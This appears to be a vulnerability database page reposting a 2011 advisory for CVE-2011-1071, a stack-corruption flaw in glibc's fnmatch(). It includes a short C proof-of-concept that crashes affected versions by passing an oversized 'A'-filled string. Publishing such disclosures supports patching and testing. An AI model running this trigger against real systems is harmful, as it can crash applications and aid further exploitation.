Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2011-1071

Publish Date: 25 Feb 2011

                							

                /*
source: http://www.securityfocus.com/bid/46563/info

GNU glibc is prone to a stack-corruption vulnerability.

An attacker can exploit this issue to execute arbitrary machine code in the context of the application that uses the affected library. Failed exploit attempts will likely crash the application.

GNU glibc versions prior to 2.12.2 are vulnerable. */

#include &lt;err.h&gt;
#include &lt;fnmatch.h&gt;
#include &lt;locale.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;string.h&gt;

int main(int argc, const char* argv[]) {
  size_t num_as;
  char* p;
  setlocale(LC_ALL, "en_US.UTF8");
  if (argc &lt; 2) {
    errx(1, "Missing argument.");
  }
  num_as = atoi(argv[1]);
  if (num_as &lt; 5) {
    errx(1, "Need 5.");
  }
  p = malloc(num_as);
  if (!p) {
    errx(1, "malloc() failed.");
  }
  memset(p, 'A', num_as);
  p[num_as - 1] = '\0';
  p[0] = 'f';
  p[1] = 'o';
  p[2] = 'o';
  p[3] = '.';
  fnmatch("*.anim[1-9j]", p, 0);
  return 0;
}

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

GNU glibc < 2.12.2 - 'fnmatch()' Stack Corruption

Vulmon Search

About

Products

Connect